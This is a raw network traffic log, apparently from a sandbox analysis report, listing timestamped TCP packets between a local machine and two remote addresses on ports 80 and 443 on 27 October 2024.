Oct 27, 2024 17:11:43.399625063 CET	80	57947	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:43.399719954 CET	57947	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:43.399909019 CET	57947	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:43.400281906 CET	80	57936	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:43.400350094 CET	57936	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:43.405879974 CET	443	57944	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.406408072 CET	57944	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.406425953 CET	443	57944	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.406864882 CET	57944	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.406872034 CET	443	57944	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.408361912 CET	443	57946	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.408592939 CET	57946	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.408600092 CET	443	57946	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.408631086 CET	443	57945	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.408847094 CET	57945	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.408860922 CET	443	57945	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.408874989 CET	57946	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.408880949 CET	443	57946	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.408911943 CET	80	57947	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:43.409296989 CET	57945	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.409300089 CET	443	57945	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.409914017 CET	443	57942	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.410072088 CET	443	57943	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.410136938 CET	57942	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.410156012 CET	443	57942	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.410274029 CET	57943	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.410314083 CET	443	57943	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.410455942 CET	57942	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.410460949 CET	443	57942	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.410619020 CET	57943	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.410631895 CET	443	57943	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.537276983 CET	443	57946	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.537353039 CET	443	57946	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.537421942 CET	57946	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.537635088 CET	57946	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.537650108 CET	443	57946	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.537662029 CET	57946	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.537668943 CET	443	57946	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.537808895 CET	443	57944	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.537858009 CET	443	57944	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.537902117 CET	57944	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.538232088 CET	57944	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.538237095 CET	443	57944	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.538249016 CET	57944	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.538254023 CET	443	57944	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.540955067 CET	57949	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.540954113 CET	57948	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.540997982 CET	443	57949	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.541009903 CET	443	57948	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.541086912 CET	57949	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.541220903 CET	57949	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.541230917 CET	57948	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.541230917 CET	57948	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.541239977 CET	443	57949	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.541316986 CET	443	57948	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.541974068 CET	443	57942	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.542134047 CET	443	57942	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.542191982 CET	57942	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.542217016 CET	57942	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.542224884 CET	443	57942	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.542232990 CET	57942	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.542237997 CET	443	57942	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.544003963 CET	57950	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.544024944 CET	443	57950	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.544111967 CET	57950	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.544222116 CET	57950	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.544234991 CET	443	57950	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.544591904 CET	443	57943	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.544658899 CET	443	57943	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.544709921 CET	57943	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.544745922 CET	443	57943	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.544778109 CET	443	57943	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.544832945 CET	57943	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.544878960 CET	57943	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.544878960 CET	57943	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.544908047 CET	443	57943	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.544933081 CET	443	57943	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.546508074 CET	57951	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.546520948 CET	443	57951	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.546580076 CET	57951	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.546678066 CET	57951	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.546694994 CET	443	57951	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.549329042 CET	443	57945	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.549361944 CET	443	57945	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.549413919 CET	57945	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.549420118 CET	443	57945	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.549465895 CET	57945	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.549570084 CET	57945	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.549582005 CET	443	57945	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.549591064 CET	57945	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.549597025 CET	443	57945	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.551328897 CET	57952	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.551415920 CET	443	57952	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:43.551505089 CET	57952	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.551600933 CET	57952	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:43.551634073 CET	443	57952	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.290601969 CET	80	57947	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:44.290709972 CET	57947	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:44.318298101 CET	443	57948	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.318829060 CET	57948	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.318861008 CET	443	57948	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.319288969 CET	57948	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.319302082 CET	443	57948	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.322298050 CET	443	57952	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.322630882 CET	57952	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.322689056 CET	443	57952	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.322967052 CET	57952	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.322983027 CET	443	57952	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.325930119 CET	443	57950	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.326205015 CET	57950	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.326220989 CET	443	57950	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.326514959 CET	57950	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.326524973 CET	443	57950	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.326966047 CET	443	57949	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.327212095 CET	57949	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.327236891 CET	443	57949	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.327548027 CET	57949	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.327555895 CET	443	57949	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.330215931 CET	443	57951	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.330487967 CET	57951	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.330499887 CET	443	57951	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.330807924 CET	57951	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.330815077 CET	443	57951	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.448479891 CET	443	57948	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.448584080 CET	443	57948	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.448637962 CET	57948	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.448765993 CET	57948	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.448765993 CET	57948	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.448792934 CET	443	57948	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.448817968 CET	443	57948	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.451330900 CET	57953	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.451361895 CET	443	57953	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.451430082 CET	57953	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.451570034 CET	57953	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.451581955 CET	443	57953	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.453385115 CET	443	57952	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.453545094 CET	443	57952	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.453612089 CET	57952	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.453664064 CET	57952	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.453664064 CET	57952	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.453696012 CET	443	57952	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.453717947 CET	443	57952	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.455425024 CET	57954	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.455470085 CET	443	57954	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.455544949 CET	57954	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.455645084 CET	57954	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.455672979 CET	443	57954	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.457329988 CET	443	57950	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.457376957 CET	443	57950	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.457428932 CET	443	57950	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.457429886 CET	57950	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.457482100 CET	57950	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.457515001 CET	57950	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.457515001 CET	57950	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.457530022 CET	443	57950	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.457549095 CET	443	57950	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.458278894 CET	443	57951	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.458425045 CET	443	57951	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.458481073 CET	57951	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.458596945 CET	57951	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.458616018 CET	443	57951	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.458630085 CET	57951	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.458636999 CET	443	57951	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.459673882 CET	57955	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.459681988 CET	443	57955	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.459733963 CET	57955	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.459912062 CET	57955	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.459920883 CET	443	57955	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.460798979 CET	57956	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.460827112 CET	443	57956	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.460880995 CET	57956	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.460993052 CET	57956	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.461004972 CET	443	57956	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.464705944 CET	443	57949	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.464835882 CET	443	57949	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.464891911 CET	57949	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.464910030 CET	57949	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.464916945 CET	443	57949	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.464929104 CET	57949	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.464934111 CET	443	57949	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.466536045 CET	57957	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.466636896 CET	443	57957	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:44.466722965 CET	57957	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.466835976 CET	57957	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:44.466871023 CET	443	57957	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.173347950 CET	443	57953	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.174150944 CET	57953	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.174175024 CET	443	57953	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.174592018 CET	57953	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.174595118 CET	443	57953	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.198671103 CET	443	57956	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.199090004 CET	57956	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.199160099 CET	443	57956	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.199419022 CET	57956	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.199433088 CET	443	57956	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.203738928 CET	443	57957	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.204020023 CET	57957	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.204046011 CET	443	57957	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.204173088 CET	443	57955	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.204293013 CET	57957	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.204299927 CET	443	57957	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.204463959 CET	57955	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.204476118 CET	443	57955	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.204731941 CET	57955	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.204735994 CET	443	57955	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.208888054 CET	443	57954	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.209146976 CET	57954	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.209178925 CET	443	57954	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.209431887 CET	57954	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.209445000 CET	443	57954	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.302752972 CET	443	57953	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.302814007 CET	443	57953	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.302901030 CET	57953	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.303395033 CET	57953	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.303404093 CET	443	57953	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.303442955 CET	57953	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.303448915 CET	443	57953	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.305728912 CET	57958	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.305773020 CET	443	57958	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.305883884 CET	57958	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.305975914 CET	57958	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.305989981 CET	443	57958	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.328499079 CET	443	57956	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.328586102 CET	443	57956	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.328665018 CET	57956	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.328896999 CET	57956	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.328922987 CET	443	57956	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.328948975 CET	57956	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.328963995 CET	443	57956	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.331533909 CET	57959	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.331593990 CET	443	57959	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.331708908 CET	57959	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.331821918 CET	57959	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.331855059 CET	443	57959	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.333591938 CET	443	57955	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.333646059 CET	443	57955	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.333693981 CET	57955	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.333832026 CET	57955	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.333837986 CET	443	57955	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.333868027 CET	57955	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.333872080 CET	443	57955	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.335448027 CET	443	57957	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.335561991 CET	443	57957	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.335638046 CET	57957	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.335638046 CET	57957	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.335678101 CET	57957	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.335695982 CET	443	57957	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.336098909 CET	57960	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.336183071 CET	443	57960	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.336278915 CET	57960	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.336410046 CET	57960	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.336443901 CET	443	57960	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.338104010 CET	57961	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.338134050 CET	443	57961	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.338217020 CET	57961	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.338361025 CET	57961	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.338373899 CET	443	57961	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.343216896 CET	443	57954	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.343286037 CET	443	57954	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.343346119 CET	57954	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.343497038 CET	57954	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.343525887 CET	443	57954	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.343554020 CET	57954	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.343569040 CET	443	57954	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.345859051 CET	57962	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.345881939 CET	443	57962	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.345985889 CET	57962	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.346115112 CET	57962	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:45.346139908 CET	443	57962	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:45.913652897 CET	57947	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:45.914052963 CET	57963	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:46.126230955 CET	80	57963	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:46.126348972 CET	57963	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:46.126533031 CET	57963	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:46.134403944 CET	80	57947	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:46.134488106 CET	57947	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:46.138161898 CET	80	57963	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:46.259619951 CET	443	57962	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.260024071 CET	57962	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.260065079 CET	443	57962	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.260302067 CET	443	57961	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.260520935 CET	57962	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.260550976 CET	443	57962	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.260719061 CET	57961	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.260732889 CET	443	57961	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.261020899 CET	57961	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.261024952 CET	443	57961	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.261552095 CET	443	57958	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.261965036 CET	57958	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.261995077 CET	443	57958	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.262489080 CET	57958	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.262500048 CET	443	57958	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.262631893 CET	443	57959	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.262936115 CET	57959	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.262984037 CET	443	57959	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.263406992 CET	57959	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.263420105 CET	443	57959	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.265510082 CET	443	57960	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.265815973 CET	57960	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.265831947 CET	443	57960	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.266280890 CET	57960	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.266290903 CET	443	57960	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.389791965 CET	443	57958	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.389827967 CET	443	57958	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.389904022 CET	443	57958	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.389909983 CET	57958	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.389970064 CET	57958	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.390153885 CET	57958	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.390182972 CET	443	57958	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.390208006 CET	57958	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.390219927 CET	443	57958	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.390700102 CET	443	57961	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.390759945 CET	443	57961	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.390810966 CET	57961	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.391592979 CET	57961	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.391608000 CET	443	57961	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.391619921 CET	57961	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.391624928 CET	443	57961	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.393368006 CET	443	57960	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.393435001 CET	443	57960	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.393500090 CET	57960	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.393532038 CET	443	57960	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.393563032 CET	443	57960	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.393616915 CET	57960	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.393908024 CET	57964	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.393966913 CET	443	57964	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.394051075 CET	57964	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.394421101 CET	57965	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.394455910 CET	443	57965	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.394515991 CET	57965	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.394615889 CET	57960	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.394648075 CET	443	57960	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.394674063 CET	57960	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.394690037 CET	443	57960	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.395673990 CET	57964	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.395704985 CET	443	57964	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.395855904 CET	443	57959	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.395904064 CET	57965	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.395920992 CET	443	57965	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.396080971 CET	443	57959	13.107.246.51	192.168.2.4
